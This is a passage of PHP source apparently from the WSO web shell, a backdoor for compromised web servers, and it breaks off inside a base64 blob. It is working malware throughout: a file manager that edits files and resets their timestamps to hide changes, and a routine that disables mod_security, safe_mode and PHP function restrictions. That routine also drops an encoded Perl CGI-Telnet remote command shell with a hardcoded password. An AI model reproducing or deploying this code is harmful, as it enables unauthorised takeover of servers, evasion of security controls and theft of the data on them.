	if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
	$stringTools = array(
		'Base64 encode' => 'base64_encode',
		'Base64 decode' => 'base64_decode',
		'Url encode' => 'urlencode',
		'Url decode' => 'urldecode',
		'Full urlencode' => 'full_urlencode',
		'md5 hash' => 'md5',
		'sha1 hash' => 'sha1',
		'crypt' => 'crypt',
		'CRC32' => 'crc32',
		'ASCII to HEX' => 'ascii2hex',
		'HEX to ASCII' => 'hex2ascii',
		'HEX to DEC' => 'hexdec',
		'HEX to BIN' => 'hex2bin',
		'DEC to HEX' => 'dechex',
		'DEC to BIN' => 'decbin',
		'BIN to HEX' => 'binhex',
		'BIN to DEC' => 'bindec',
		'String to lower case' => 'strtolower',
		'String to upper case' => 'strtoupper',
		'Htmlspecialchars' => 'htmlspecialchars',
		'String length' => 'strlen',
	);
	if(isset($_POST['ajax'])) {
		$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
		ob_start();
		if(in_array($_POST['p1'], $stringTools))
			echo $_POST['p1']($_POST['p2']);
		$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"

	\'")."';
";
		echo strlen($temp), "
", $temp;
		exit;
	}
	wsoHeader();
	echo '<h1>String conversions</h1><div class=content>';
	if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
	echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
	foreach($stringTools as $k => $v)
		echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
		echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
			<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
			<tr><td></td><td><input type='submit' value='>>'></td></tr>
			</table></form>";

	function wsoRecursiveGlob($path) {
		if(substr($path, -1) != '/')
			$path.='/';
		$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
		if(is_array($paths)&&@count($paths)) {
			foreach($paths as $item) {
				if(@is_dir($item)){
					if($path!=$item)
						wsoRecursiveGlob($item);
				} else {
					if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
						echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
				}
			}
		}
	}
	if(@$_POST['p3'])
		wsoRecursiveGlob($_POST['c']);
	echo "</div><br><h1>Search for hash:</h1><div class=content>
		<form method='post' target='_blank' name='hf'>
			<input type='text' name='hash' style='width:200px;'><br>
			<input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
			<input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
			<input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
			<input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
		</form></div>";
	wsoFooter();
}

function actionFilesTools() {
	if( isset($_POST['p1']) )
		$_POST['p1'] = urldecode($_POST['p1']);
	if(@$_POST['p2']=='download') {
		if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
			ob_start("ob_gzhandler", 4096);
			header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
			if (function_exists("mime_content_type")) {
				$type = @mime_content_type($_POST['p1']);
				header("Content-Type: ".$type);
			}
			$fp = @fopen($_POST['p1'], "r");
			if($fp) {
				while(!@feof($fp))
					echo @fread($fp, 1024);
				fclose($fp);
			}
		}exit;
	}
	if( @$_POST['p2'] == 'mkfile' ) {
		if(!file_exists($_POST['p1'])) {
			$fp = @fopen($_POST['p1'], 'w');
			if($fp) {
				$_POST['p2'] = "edit";
				fclose($fp);
			}
		}
	}
	wsoHeader();
	echo '<h1>File tools</h1><div class=content>';
	if( !file_exists(@$_POST['p1']) ) {
		echo 'File not exists';
		wsoFooter();
		return;
	}
	$uid = @posix_getpwuid(@fileowner($_POST['p1']));
	if(!$uid) {
		$uid['name'] = @fileowner($_POST['p1']);
		$gid['name'] = @filegroup($_POST['p1']);
	} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
	echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
	echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
	if( empty($_POST['p2']) )
		$_POST['p2'] = 'view';
	if( is_file($_POST['p1']) )
		$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
	else
		$m = array('Chmod', 'Rename', 'Touch');
	foreach($m as $v)
		echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
	echo '<br><br>';
	switch($_POST['p2']) {
		case 'view':
			echo '<pre class=ml1>';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '</pre>';
			break;
		case 'highlight':
			if( @is_readable($_POST['p1']) ) {
				echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
				$code = @highlight_file($_POST['p1'],true);
				echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
			}
			break;
		case 'chmod':
			if( !empty($_POST['p3']) ) {
				$perms = 0;
				for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
					$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
				if(!@chmod($_POST['p1'], $perms))
					echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
			}
			clearstatcache();
			echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
			break;
		case 'edit':
			if( !is_writable($_POST['p1'])) {
				echo 'File isn\'t writeable';
				break;
			}
			if( !empty($_POST['p3']) ) {
				$time = @filemtime($_POST['p1']);
				$_POST['p3'] = substr($_POST['p3'],1);
				$fp = @fopen($_POST['p1'],"w");
				if($fp) {
					@fwrite($fp,$_POST['p3']);
					@fclose($fp);
					echo 'Saved!<br><script>p3_="";</script>';
					@touch($_POST['p1'],$time,$time);
				}
			}
			echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '</textarea><input type=submit value=">>"></form>';
			break;
		case 'hexdump':
			$c = @file_get_contents($_POST['p1']);
			$n = 0;
			$h = array('00000000<br>','','');
			$len = strlen($c);
			for ($i=0; $i<$len; ++$i) {
				$h[1] .= sprintf('%02X',ord($c[$i])).' ';
				switch ( ord($c[$i]) ) {
					case 0:  $h[2] .= ' '; break;
					case 9:  $h[2] .= ' '; break;
					case 10: $h[2] .= ' '; break;
					case 13: $h[2] .= ' '; break;
					default: $h[2] .= $c[$i]; break;
				}
				$n++;
				if ($n == 32) {
					$n = 0;
					if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
					$h[1] .= '<br>';
					$h[2] .= "
";
				}
		 	}
			echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
			break;
		case 'rename':
			if( !empty($_POST['p3']) ) {
				if(!@rename($_POST['p1'], $_POST['p3']))
					echo 'Can\'t rename!<br>';
				else
					die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
			}
			echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
			break;
		case 'touch':
			if( !empty($_POST['p3']) ) {
				$time = strtotime($_POST['p3']);
				if($time) {
					if(!touch($_POST['p1'],$time,$time))
						echo 'Fail!';
					else
						echo 'Touched!';
				} else echo 'Bad time format!';
			}
			clearstatcache();
			echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
			break;
	}
	echo '</div>';
	wsoFooter();
}

function actionSafeMode() {
unlink($GLOBALS['cwd'].".htaccess");
unlink($GLOBALS['cwd']."php.ini");
 $fil=fopen($GLOBALS['cwd'].".htaccess","w");
    fwrite($fil,'<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>');
    fclose($fil);
	$fil=fopen($GLOBALS['cwd']."php.ini","w");
      fwrite($fil,'safe_mode=OFF
disable_functions=NONE');
     fclose($fil);
@mkdir('dkcgi',0755);
$file = fopen($dir."dkcgi/.htaccess" ,"w+");
$sa=base64_decode('T3B0aW9ucyBhbGwKRGlyZWN0b3J5SW5kZXggU3V4Lmh0bWwKQWRkVHlwZSB0ZXh0L3BsYWluIC5w
aHAKQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuc2EKQWRkSGFuZGxlciBzZXJ2ZXIt
cGFyc2VkIC5waHAKQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5zYQpBZGRIYW5kbGVyIGNnaS1zY3Jp
cHQgLnNh');
$write = fwrite ($file ,$sa);

$file = fopen($dir."dkcgi/cgi.pl" ,"w+");
$sa=base64_decode('IyEvdXNyL2Jpbi9wZXJsDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIENvcHlyaWdodCBhbmQgTGljZW5jZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBDR0ktVGVsbmV0IFZlcnNpb24gMS4wIGZvciBOVCBhbmQgVW5peCA6IFJ1biBDb21tYW5kcyBvbiB5b3VyIFdlYiBTZXJ2ZXINCiMNCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmENCiMgUGVybWlzc2lvbiBpcyBncmFudGVkIHRvIHVzZSwgZGlzdHJpYnV0ZSBhbmQgbW9kaWZ5IHRoaXMgc2NyaXB0IHNvIGxvbmcNCiMgYXMgdGhpcyBjb3B5cmlnaHQgbm90aWNlIGlzIGxlZnQgaW50YWN0LiBJZiB5b3UgbWFrZSBjaGFuZ2VzIHRvIHRoZSBzY3JpcHQNCiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQ0KIyBpbiB0aGlzIHNjcmlwdCwgeW91IGNhbiBlLW1haWwgbWUuDQojDQojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQ0KIyBBdXRob3IgZS1tYWlsOiByb2hpdGFiQHJvaGl0YWIuY29tDQojIEF1dGhvciBIb21lcGFnZTogaHR0cDovL3d3dy5yb2hpdGFiLmNvbS8NCiMgU2NyaXB0IEhvbWVwYWdlOiBtYWlsdG86VU5JVFhfVEVBTUBIT1RNQUlMLkNPTQ0KIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8NCiMgRGlzY3Vzc2lvbiBGb3J1bTogaHR0cDovL3d3dy5yb2hpdGFiLmNvbS9kaXNjdXNzLw0KIyBNYWlsaW5nIExpc3Q6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vbWxpc3QvDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgSW5zdGFsbGF0aW9uDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRvIGluc3RhbGwgdGhpcyBzY3JpcHQNCiMNCiMgMS4gTW9kaWZ5IHRoZSBmaXJzdCBsaW5lICIjIS91c3IvYmluL3BlcmwiIHRvIHBvaW50IHRvIHRoZSBjb3JyZWN0IHBhdGggb24NCiMgICAgeW91ciBzZXJ2ZXIuIEZvciBtb3N0IHNlcnZlcnMsIHlvdSBtYXkgbm90IG5lZWQgdG8gbW9kaWZ5IHRoaXMuDQojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4NCiMgMy4gSWYgeW91J3JlIHJ1bm5pbmcgdGhlIHNjcmlwdCB1bmRlciBXaW5kb3dzIE5ULCBzZXQgJFdpbk5UID0gMSBpbiB0aGUNCiMgICAgQ29uZmlndXJhdGlvbiBTZWN0aW9uIGJlbG93Lg0KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8NCiMgICAgZXhlY3V0ZSBDR0kgc2NyaXB0cy4gVGhpcyBpcyB1c3VhbGx5IGNnaS1iaW4uIE1ha2Ugc3VyZSB0aGF0IHlvdSB1cGxvYWQNCiMgICAgdGhlIHNjcmlwdCBpbiBBU0NJSSBtb2RlLg0KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4NCiMgNi4gT3BlbiB0aGUgc2NyaXB0IGluIHlvdXIgd2ViIGJyb3dzZXIuIElmIHlvdSB1cGxvYWRlZCB0aGUgc2NyaXB0IGluDQojICAgIGNnaS1iaW4sIHRoaXMgc2hvdWxkIGJlIGh0dHA6Ly93d3cueW91cnNlcnZlci5jb20vY2dpLWJpbi9jZ2l0ZWxuZXQucGwNCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdlIG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdvcmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3b3JkID0gImRrIjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3JpcHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBvbiBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENtZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNlcCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJhdGlvbiA9IDEwMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQNCgkJCQkjIERvbid0IHNldCB0aGlzIHRvIGEgdmVyeSBsYXJnZSB2YWx1ZS4gVGhpcyBpcw0KCQkJCSMgdXNlZnVsIGZvciBjb21tYW5kcyB0aGF0IG1heSBoYW5nIG9yIHRoYXQNCgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuDQoJCQkJIyBUaGlzIGlzIHZhbGlkIG9ubHkgb24gVW5peCBzZXJ2ZXJzLiBJdCBpcw0KCQkJCSMgaWdub3JlZCBvbiBOVCBTZXJ2ZXJzLg0KDQokU2hvd0R5bmFtaWNPdXRwdXQgPSAxOwkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQ0KCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlDQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kDQoJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlDQoJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQNCgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4NCg0KIyBET04nVCBDSEFOR0UgQU5ZVEhJTkcgQkVMT1cgVEhJUyBMSU5FIFVOTEVTUyBZT1UgS05PVyBXSEFUIFlPVSdSRSBET0lORyAhIQ0KDQokQ21kU2VwID0gKCRXaW5OVCA/ICROVENtZFNlcCA6ICRVbml4Q21kU2VwKTsNCiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsNCiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOw0KJFJlZGlyZWN0b3IgPSAoJFdpbk5UID8gIiAyPiYxIDE+JjIiIDogIiAxPiYxIDI+JjEiKTsNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0DQojIHBhcnNlcyBHRVQsIFBPU1QgYW5kIG11bHRpcGFydC9mb3JtLWRhdGEgdGhhdCBpcyB1c2VkIGZvciB1cGxvYWRpbmcgZmlsZXMuDQojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uDQojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mDQojIHRoZSB2YXJpYWJsZS4gTm90ZTogTW9zdCBvZiB0aGUgY29kZSBpbiB0aGlzIGZ1bmN0aW9uIGlzIHRha2VuIGZyb20gb3RoZXIgQ0dJDQojIHNjcmlwdHMuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUmVhZFBhcnNlDQp7DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOw0KDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcNCgkJQGxpc3QgPSBzcGxpdCgvJEJvdW5kYXJ5LywgJGluKTsNCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87DQoJCSRpbnsnZid9ID0gJDE7DQoJCSRpbnsnZid9ID1+IHMvXCIvL2c7DQoJCSRpbnsnZid9ID1+IHMvXHMvL2c7DQoNCgkJIyBwYXJzZSB0cmFpbGVyDQoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspDQoJCXsNCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOw0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+VW5pdC1YIFRlYW08L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQo8L2hlYWQ+DQo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzAwMDAwMCIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4NCjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRyPg0KPHRkIGJnY29sb3I9IiNDMkJGQTUiIGJvcmRlcmNvbG9yPSIjMDAwMDgwIiBhbGlnbj0iY2VudGVyIj4NCjxiPjxmb250IGNvbG9yPSIjMDAwMDgwIiBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjMDA5OTAwIj48Yj5DR0ktVGVsbmV0IFVuaXQteCBUZWFtIENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0MyQkZBNSI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT11cGxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPlVwbG9hZCBGaWxlPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+RG93bmxvYWQgRmlsZTwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8DQo8YSBocmVmPSJVTklUWF9URUFNQEhPVE1BSUwuQ09NIj5IZWxwPC9hPg0KPC9mb250PjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0t